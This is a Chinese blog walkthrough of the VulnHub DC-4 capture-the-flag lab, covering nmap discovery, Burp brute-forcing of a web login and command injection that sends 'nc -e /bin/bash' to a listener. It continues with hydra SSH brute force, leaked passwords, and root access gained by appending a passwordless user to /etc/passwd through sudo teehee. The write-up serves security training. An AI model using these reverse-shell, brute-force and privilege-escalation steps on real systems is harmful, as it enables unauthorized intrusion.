DC-4靶机详情

于 2024-09-14 10:35:42 发布
阅读量245 收藏 2
点赞数
文章标签: linux 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaoyanglailo/article/details/142252280
版权

项目地址

```plain https://download.vulnhub.com/dc/DC-4.zip ```

实验过程

将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机

![](https://img-blog.csdnimg.cn/img_convert/f7bd7e20f3d9eaeba464beed29cceb89.png)

使用nmap进行主机发现,获取靶机IP地址

```plain nmap 192.168.47.1-254 ```

根据对比可知DC-4的一个ip地址为192.168.47.145

扫描DC-4的操作系统,端口及对应服务

```plain nmap -A -p- 192.168.47.145 ```

发现开放22和80端口

访问http://192.168.47.145

![](https://img-blog.csdnimg.cn/img_convert/48763b3cfb6b6e985ec0678af08d62b7.png)

发现是个登录界面

尝试使用BP抓包进行爆破

![](https://img-blog.csdnimg.cn/img_convert/558be61e2e44fae476f958fe95f4fef5.png)
发送到Intruder模块
![](https://img-blog.csdnimg.cn/img_convert/1873213081b7dbf208ff47b73891e5a2.png)

载入密码字典,开始攻击
![](https://img-blog.csdnimg.cn/img_convert/eaad272bfcfdfa1abeb1c256711032f1.png)

对lenth进行排序,发现一个长度异常单位

使用这个密码尝试登录
![](https://img-blog.csdnimg.cn/img_convert/1c7479fca344f05a8839af8b49a4ddce.png)

登录成功

漏洞利用

![](https://img-blog.csdnimg.cn/img_convert/353316ef2d281c334d33755d11f79917.png)

发现这里可以执行相关命令

可以考虑使用BP篡改数据包来反弹shell

抓包
![](https://img-blog.csdnimg.cn/img_convert/7e16a952f6905e1012ef7a0d27c2c9e9.png)

发现radio可以修改

设置监听
```plain nc -lvvp 8888 ```

反弹shell
注意原数据包空格用+代替的,所以我们也用+来代替 
nc+-e+/bin/bash+192.168.47.129+8888

放包

反弹成功
![](https://img-blog.csdnimg.cn/img_convert/2d7c397005407e67e9dbae31cd4bac67.png)
获得交互式shell
```plain python -c 'import pty;pty.spawn("/bin/bash")' ```

提权

![](https://img-blog.csdnimg.cn/img_convert/f839d5a676c8e1e010763c6660360a93.png)
四处翻翻
![](https://img-blog.csdnimg.cn/img_convert/96fd5a190f9044b4593b61b90bf954ff.png)

翻到一份密码字典

一个没权限查看的文件

复制一份内容写进password.txt文件中
![](https://img-blog.csdnimg.cn/img_convert/1aa5979762d75c441783b7b83f131d87.png)
使用hydra命令进行爆破
```plain hydra -l jim -P password.txt -t 1 -vV -e ns 192.168.47.145 ssh -o ssh.txt -f ssh://192.168.47.145 ```

爆破出来密码是jibril04

使用ssh连接
![](https://img-blog.csdnimg.cn/img_convert/761f7b12e67d969c6630c2eb3210f79b.png)

连接成功

尝试查看刚才没权限的那个文件
```plain cat /home/jim/mbox ```

看上去像是收到一封邮件

去var/mail找找
```plain cat /var/mail/jim ```

通过文件内容得到了charles的密码^xHhA&hvim0y

登录charles账户
![](https://img-blog.csdnimg.cn/img_convert/b6faf6e044b450bb1232dce1bef9baac.png)

登录成功

查看权限
![](https://img-blog.csdnimg.cn/img_convert/eb3fc38783093eb130b00a287ca591c8.png)

发现charles有teehee命令的权限

使用teehee创建一个root用户
```plain echo "huacha::0:0:::/bin/sh" | sudo teehee -a /etc/passwd ```

添加成功

切换账户
![](https://img-blog.csdnimg.cn/img_convert/0c26c4394b5316c7b353ceb2c06eb38e.png)

发现flag.txt在/root目录下

查看flag
![](https://img-blog.csdnimg.cn/img_convert/4c04a2502d8f369b74841e6c5bfb4287.png)
秋喜秋
关注
【vulnhub】---DC-4靶机
qq_43168364的博客
08-21 1953
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机DC-4靶机(192.168.15.152) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗透步骤 渗透思路 ......
dc-1靶机实战详情(新手)
kyp_1994的博客
08-28 1130
dc-1靶机详细获取flag过程新手勿喷
DC-4靶机
mlws1900的博客
03-24 1093
下载不下来用迅雷下载。
DC-4靶机渗透
weixin_45349299的博客
12-21 1048
开放的端口:22 => ssh服务 ---- OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)80 => http服务 ---- nginx 1.15.10扫描出来的网站目录。
DC-4靶机渗透测试详细教程
啊醒的博客
05-04 3918
DC-4靶机渗透测试详细教程
DC-5靶机
mlws1900的博客
03-25 815
得知文件包含漏洞,我们可以在ssh日志,中间件日志以及临时文件中写入一句话木马然后进行包含,即可解析。我们可以利用nginx日志写入一句话木马。切换nat模式,有问题全选重试和是,打到这了,我感觉这个配置我都不用写了,启动靶机如下图所示即可。啥玩意没有,点击contact,发现一个留言板,测试了xss啥也没有。以上操作要在bp中发包,我直接在浏览器中修改,不知道为什么无法写入。如上图所示,我试了在浏览器中无法写入日志,打开蚁剑连接shell。上面那个没试过,下面这个试了成功, 都需要在bp中进行操作。
DC-4靶机攻略
真正的大师,永远都怀着一颗学徒的心。
07-27 1099
文章目录前言一、DC-4的信息收集1.确定IP,端口号;2 访问目标80端口,收集信息二、通过暴力破解密码,成功登陆1.确定密码字典,利用hydra进行爆破。三. 抓包改命令,为我所用1.分析界面2.BP抓包,修改命令3 进入用户家目录收集信息4.hydra爆破ssh账户密码。四.ssh登陆总结- - -思路 前言 在本章将介绍DC-4靶机的攻略。 DC-1攻略:点击这里! DC-2攻略:点击这里! 提示:以下是本篇文章正文内容,下面案例可供参考 一、DC-4的信息收集 1.确定IP,端口号; 命令:n
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC-4靶机提权超详细过程
02-29
### DC-4靶机提权超详细过程 #### 一、前言 本文将详细介绍如何在DC-4靶机上进行权限提升的过程,包括利用Kali Linux进行初始渗透测试、爆破登录凭证、获取敏感信息以及最终实现权限提升的具体步骤。通过本教程,...
dc-4靶机练习.docx
01-02
靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有...
Linux】:信号与信号产生
Yikefore的博客
09-12 785
信号的基本概念、对信号的理解、信号的多种产生方式以及核心转储的详细介绍!
Linux 进程控制
2302_77289177的博客
09-08 1282
Linux 进程控制
高效诊断Linux性能问题
Tiger93的博客
09-08 550
诊断Linux性能问题
.Net 执行Linux下多行shell命令方法
xk_hypothesis的博客
09-10 384
2.使用 3.解释 规范化换行符:使用 NormalizeNewlines 方法将所有换行符替换为 LF(\n)。 这样可以确保在 Linux 系统上执行时不会出现问题。 执行 Shell 命令:使用 ProcessStartInfo 配置进程启动信息。 设置 FileName 为 /bin/bash。 设置 Arguments 为执行命令所需的参数,使用 -c 参数来执行命令。 设置 UseShellExecute 为 false,以便更好地控制进程。 设置 RedirectStandardOutput
Linux之MySQL主从复制
2302_79087378的博客
09-08 1488
MySQL的主从复制()是一种数据复制解决方案,将主数据库的DDL(数据定义语言)和DML(数据操纵语言)操作通过二进制日志传到从库服务器中,然后在从库上对这些日志重新执行(也叫重做),从而是的从库和主库的数据保存同步。MySQL支持将数据从一个MySQL服务器(主服务器)复制到一个或多个其他MySQL服务器(从服务器),从库同时也可以作为其他从服务器的主库,实现链状复制。MySQL主从复制的优点主要包含以下三个方面:主库出现问题,可以快速切换到从库提供服务;实现读写分离,降低主库的访问压力;
LinuxLinux 可重入函数
2403_86785171的博客
09-08 1035
简单来说,可重入函数是线程安全的函数。当函数正在执行时,如果它被其他线程或中断再次调用,它能够正确处理这种情况。不使用静态或全局变量,或仅使用局部变量。不依赖非线程安全的库函数,如malloc或strtok。不修改输入参数。如果函数需要访问共享资源,则必须使用同步机制(如锁或信号量)来避免竞态条件。
LINUX】在ubuntu中安装tomcat
09-11 216
#instal jdk apt install openjdk-8-jdk -y#enter install path cd /home/a/#copy tomcat package cp /mnt/hgfs/Share/apache-tomcat-9.0.93.tar.gz .#unpress tomcat package tar -xf apache-tomcat-9.0.93.tar.gz #enter bin path cd apache-tomcat-9.0.93/bin#start the se
直播相关01-录制麦克风声音,QT上 .pro 将 linux,mac和windows上配置为三种可以共享, 在.pro文件中 message 的作用
hunandede的博客
09-09 654
一 QT 上的 .pro 文件将 linux,mac和windows上配置设置为可以共享 1. 先来看文件夹布局 2. 再来看 QT 中的 .pro文件
Linux云计算 |【第三阶段】PROJECT1-DAY1
最新发布
小安的运维专栏
09-13 1351
服务器硬件(RAID磁盘阵列、IDRAC远程控制卡)、部署LNMP动态网站(部署LNMP平台、上线Wordpress代码、创建数据库、初始化Wordpress)
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值